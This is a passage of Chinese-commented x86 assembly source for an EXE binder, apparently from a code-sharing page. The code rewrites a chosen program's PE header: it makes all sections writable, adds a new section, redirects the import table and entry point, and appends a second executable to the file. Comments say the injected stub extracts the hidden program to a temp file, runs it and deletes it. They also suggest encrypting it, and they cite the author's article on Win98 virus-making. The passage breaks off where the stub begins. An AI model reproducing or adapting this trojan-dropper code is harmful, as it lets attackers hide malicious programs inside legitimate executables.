📄 ee.asm
字号:
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
mov [tempfileh],eax
.if eax==INVALID_HANDLE_VALUE
call MessageBoxA,[MainhWnd],offset ErrA_str,offset Err_Title,64
mov eax,0
jmp exit_initfile
.else
call GetFileSize,[tempfileh],NULL
mov ecx,1024
cdq
div ecx
mov [FileCSize],eax
.endif
call CloseHandle,[tempfileh]
; 检查A文件存不存在,并计算A文件的大小。
;------------------------------------(上面的)--
call CreateFileA,offset buffert,GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_READ or FILE_SHARE_WRITE, \
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
mov [tempfileh],eax
.if eax==INVALID_HANDLE_VALUE
call MessageBoxA,[MainhWnd],offset ErrB_str,offset Err_Title,64
mov eax,0
jmp exit_initfile
.else
call GetFileSize,[tempfileh],NULL
mov ecx,1024
cdq
div ecx
mov [FileBSize],eax
.endif
call CloseHandle,[tempfileh]
; 检查B文件存不存在,并计算B文件的大小
;------------------------------------(上面的)--
call RtlZeroMemory,offset bakfile,size bakfile
call lstrcpy,offset bakfile,offset buffer
call lstrcat,offset bakfile,offset BakFilter
call CopyFileA,offset buffer,offset bakfile,0
mov eax,1
; 将源文件备份一下
;------------------------------------(上面的)--
exit_initfile:
ret
initfile endp
SelectAFile proc ; 选择A文件
lea eax,VFile
call RtlZeroMemory,eax,size VFile
mov [VFile.lStructSize],size VFile
push [MainhWnd]
pop [VFile.hwndOwner]
push [vhInstance]
pop [VFile.hInstance]
mov [VFile.lpstrFilter],offset FileFilter
mov [VFile.lpstrFile],offset buffer
mov byte ptr [buffer],0
mov [VFile.nMaxFile],size buffer
mov [VFile.lpstrTitle],offset OpenFileTitle
mov [VFile.vFlags],OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_PATHMUSTEXIST or OFN_EXPLORER or OFN_LONGNAMES
call GetOpenFileNameA,offset VFile
.if eax!=0
call SetDlgItemTextA,[MainhWnd],VZL_SRCTA,offset buffer
.endif
ret
SelectAFile endp
SelectBFile proc ; 选择B文件
lea eax,VFileB
call RtlZeroMemory,eax,size VFileB
mov [VFileB.lStructSize],size VFileB
push [MainhWnd]
pop [VFileB.hwndOwner]
push [vhInstance]
pop [VFileB.hInstance]
mov [VFileB.lpstrFilter],offset FileFilter
mov [VFileB.lpstrFile],offset buffert
mov byte ptr [buffert],0
mov [VFileB.nMaxFile],size buffert
mov [VFileB.lpstrTitle],offset OpenFileTitleB
mov [VFileB.vFlags],OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_PATHMUSTEXIST or OFN_EXPLORER or OFN_LONGNAMES
call GetOpenFileNameA,offset VFileB
.if eax!=0
call SetDlgItemTextA,[MainhWnd],VZL_SRCTB,offset buffert
.endif
ret
SelectBFile endp
;===============================================================================
; 以下的大部份代码请参阅我以前的两篇文章
; 《Win98病毒制作原理-完整版》
; 《PE引入表修改实战》
MakePe proc uses edi esi eax ecx edx ebx
call CreateFileA,offset buffer,GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_READ or FILE_SHARE_WRITE, \
NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
.if eax!=INVALID_HANDLE_VALUE
mov [hFile],eax
call SetFilePointer,[hFile],3ch,0,FILE_BEGIN
call ReadFile,[hFile],offset PE_head_addr,4,offset byte_read,0
.if eax!=0
call SetFilePointer,[hFile],[PE_head_addr],0,FILE_BEGIN
call ReadFile,[hFile],offset PE_head,Head_len,offset byte_read,0
push [PE_head.OptionalHeader.AddressOfEntryPoint]
pop [now_in]
push [PE_head.OptionalHeader.ImageBase]
pop [now_base]
push [PE_head.OptionalHeader.ImageBase]
pop [BASE_RVA]
mov eax,[now_in]
add eax,[now_base]
mov [now_basein],eax
mov [Src_addr],eax
movzx eax,[PE_head.FileHeader.SizeOfOptionalHeader]
add eax,18h
mov [Section_addr],eax
mov [checker_len],offset vend-offset vstart
movzx eax,[PE_head.FileHeader.NumberOfSections]
inc eax
mov ecx,28h
mul ecx
add eax,[Section_addr]
add eax,[PE_head_addr]
.if eax>[PE_head.OptionalHeader.SizeOfHeaders]
call MessageBoxA,[MainhWnd],offset ErrB_str,offset Err_Title,64
.else
mov esi,offset Section_table
;--------------------------------------\/---
pushad
push esi
push ecx
movzx ecx,[PE_head.FileHeader.NumberOfSections]
loops:
.if ecx==0
jmp loopend
.endif
or [esi+24h],80000000h
add esi,28h
dec ecx
jmp loops
loopend:
pop ecx
pop esi
popad
; 将节的属性全部改啦
;------------------------------------(上面的)--
movzx eax,[PE_head.FileHeader.NumberOfSections]
mov ecx,28h
mul ecx
add esi,eax
inc [PE_head.FileHeader.NumberOfSections]
mov edi,offset new_section
xchg edi,esi
mov eax,[edi-28h+8]
add eax,[edi-28h+0ch]
;--------------------------------------------------
mov [temp_virt_addr],eax ;存未对齐时的RVA
;--------------------------------------------------
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
cdq
div ecx
test edx,edx
jz nextgoa
inc eax
nextgoa:
mul ecx
mov [new_section.virt_addr],eax
;---------------------------保存原引入表--
mov eax,[PE_head.OptionalHeader.DataDirectory(8).VirtualAddress]
mov [MI_RVA],eax
;------------------IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT清零---
push 0
pop [PE_head.OptionalHeader.DataDirectory(88).VirtualAddress]
;----------------------------填写引入表---------------------
mov eax,v_ImportA-vstart
add eax,[new_section.virt_addr]
mov [PE_head.OptionalHeader.DataDirectory(8).VirtualAddress],eax
mov [PE_head.OptionalHeader.DataDirectory(8).isize],Import_len
add dword ptr [v_ImportA],eax
add dword ptr [v_DllNameA],eax
add dword ptr [v_FThunkA],eax
add dword ptr [Ker_API],eax
add dword ptr [Ker_API+4],eax
add dword ptr [Ker_API+8],eax
add dword ptr [Ker_API+0Ch],eax
add dword ptr [Ker_API+10h],eax
add dword ptr [Ker_API+14h],eax
add dword ptr [Ker_API+18h],eax
add dword ptr [Ker_API+1Ch],eax
add dword ptr [Ker_API+20h],eax
add dword ptr [Ker_API+24h],eax
add dword ptr [Ker_API+28h],eax
add dword ptr [Ker_API+2Ch],eax
add dword ptr [Ker_API+30h],eax
add dword ptr [Ker_API+34h],eax
add dword ptr [Ker_API+38h],eax
add dword ptr [Ker_API+3ch],eax
add dword ptr [Ker_API+40h],eax
add dword ptr [vGetProcAddress],eax
add dword ptr [vGetModuleHandleA],eax
add dword ptr [vLoadLibraryA],eax
add dword ptr [vExitProcess],eax
add dword ptr [vCreateFileA],eax
add dword ptr [vCreateFileMappingA],eax
add dword ptr [vGetTempPathA],eax
add dword ptr [vGetTempFileNameA],eax
add dword ptr [vlstrlen],eax
add dword ptr [vMapViewOfFile],eax
add dword ptr [vWriteFile],eax
add dword ptr [vUnmapViewOfFile],eax
add dword ptr [vCloseHandle],eax
add dword ptr [vCopyFileA],eax
add dword ptr [vGetModuleFileNameA],eax
add dword ptr [vDeleteFileA],eax
add dword ptr [vWinExec],eax
add dword ptr [v_ImportB],eax
add dword ptr [v_DllNameB],eax
add dword ptr [v_FThunkB],eax
add dword ptr [Use_API],eax
add dword ptr [vMessageBoxA],eax
;-----------------------------------------
mov eax,[checker_len]
;--------------------------------------------------
mov [temp_raw_size],eax ;存未对齐时的物理大小
;--------------------------------------------------
mov ecx,[PE_head.OptionalHeader.FileAlignment]
div ecx
test edx,edx
jz nextgob
inc eax
nextgob:
mul ecx
mov [new_section.raw_size],eax
mov eax,[checker_len]
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
div ecx
test edx,edx
jz nextgoc
inc eax
nextgoc:
mul ecx
mov [new_section.virt_size],eax
mov eax,[edi-28h+14h]
add eax,[edi-28h+10h]
mov [new_section.raw_offset],eax
;-------------------------------------------------------
mov eax,[new_section.virt_addr]
add eax,[temp_raw_size]
mov ecx,[PE_head.OptionalHeader.SectionAlignment]
div ecx
test edx,edx
jz nextgod
inc eax
nextgod:
mul ecx
mov [PE_head.OptionalHeader.SizeOfImage],eax
mov ecx,28h
rep movsb
mov eax,[new_section.virt_addr]
mov [PE_head.OptionalHeader.AddressOfEntryPoint],eax
call SetFilePointer,[hFile],[PE_head_addr],0,FILE_BEGIN
call WriteFile,[hFile],offset PE_head,Head_len,offset byte_read,0
call SetFilePointer,[hFile],[new_section.raw_offset],0,FILE_BEGIN
;-----------------------------------
push eax
mov eax,[new_section.raw_size]
add eax,[new_section.raw_offset]
mov [Save_add],eax
lea eax,[buffert]
call CreateFileA,eax,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
mov [hFile_st],eax
call GetFileSize,[hFile_st],NULL
mov [Save_size],eax ;存储文件的大小
call CloseHandle,[hFile_st]
pop eax
;-----------------------------------
mov eax,offset vstart
call WriteFile,[hFile],eax,[new_section.raw_size],offset byte_read,0
call CloseHandle,[hFile]
push 0
pop [hFile]
lea eax,[buffert]
lea edx,[buffer]
call ReadWriteFileS,eax,edx,[Save_add]
; 调用 ReadWriteFileS
; 参数有两个EXE文件的路径,PE文件末的地址
;------------------------------------(上面的)--
mov [CreateOK],1
.endif
.endif
.endif
mov eax,0
.if [hFile]!=eax
call CloseHandle,[hFile]
.endif
ret
MakePe endp
ReadWriteFileS proc uses edx edi esi,SFilepath:dword,DFilepath:dword,WOffaddr
call CreateFileA,[SFilepath],GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
mov [hFile_s],eax
call CreateFileMappingA,[hFile_s],NULL,PAGE_READWRITE,0,0,NULL
mov [hFMap_s],eax
call CreateFileA,[DFilepath],GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
mov [hFile_d],eax
call MapViewOfFile,[hFMap_s],FILE_MAP_WRITE,0,0,0
mov [hMemory],eax
call SetFilePointer,[hFile_d],[WOffaddr],0,FILE_BEGIN ;****
call GetFileSize,[hFile_s],NULL
mov [Save_size],eax ;存储文件的大小
lea edx,[ReadBye]
call WriteFile,[hFile_d],[hMemory],eax,edx,NULL
call UnmapViewOfFile,[hMemory]
call CloseHandle,[hFMap_s]
mov [hFMap_s],0
call CloseHandle,[hFile_s]
call CloseHandle,[hFile_d]
; 将第二个EXE文件写入第二个EXE文件的末尾处
; 额外话:其实已将第二个EXE文件映入内存啦
; 比较好操作,可以将第二个EXE文件
; 的内容进行加密处理,再写入第一个
; 文件内,解出时先解密,再解出。
;------------------------------------(上面的)--
ret
ReadWriteFileS endp
;================================================================================
;================================================================================
; 以下部份就是写入生成的EXE文件的部份啦
; 大体操作:
; 取得临时文件名,将文件读出来,并保存为EXE文件;
; 再执行这个EXE文件,删除临时文件。
; 导入原文件引入表,返回原PE文件的入口
.data
vstart:
call nowstart
nowstart:
pop ebp
sub ebp,offset nowstart
;==========================输入文件参数表============
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -